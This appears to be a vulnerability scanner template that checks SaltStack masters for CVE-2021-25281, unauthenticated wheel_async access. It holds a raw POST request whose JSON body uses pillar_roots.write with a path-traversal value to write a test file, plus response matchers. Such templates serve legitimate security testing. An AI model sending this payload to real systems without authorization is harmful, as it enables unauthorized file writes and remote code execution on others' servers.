id: CVE-2021-25281 info: name: CVE-2021-25281 - SaltStack wheel_async unauth access author: madrobot severity: critical reference: http://hackdig.com/02/hack-283902.htm description: The SaltAPI does not honor eauth credentials for the wheel_async client. Thus, an attacker can remotely run any wheel modules on the master. tags: cve,cve2021,saltapi,rce,saltstack classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 cve-id: CVE-2021-25281 cwe-id: CWE-287 requests: - raw: - | POST /run HTTP/1.1 Host: {{Hostname}} Content-Type: application/json {"client":"wheel_async","fun":"pillar_roots.write","data":"testing","path":"../../../../../../../tmp/testing","username":"1","password":"1","eauth":"pam"} matchers-condition: and matchers: - type: word words: - "return" - "tag" - "jid" - "salt" - "wheel" part: body condition: and - type: status status: - 200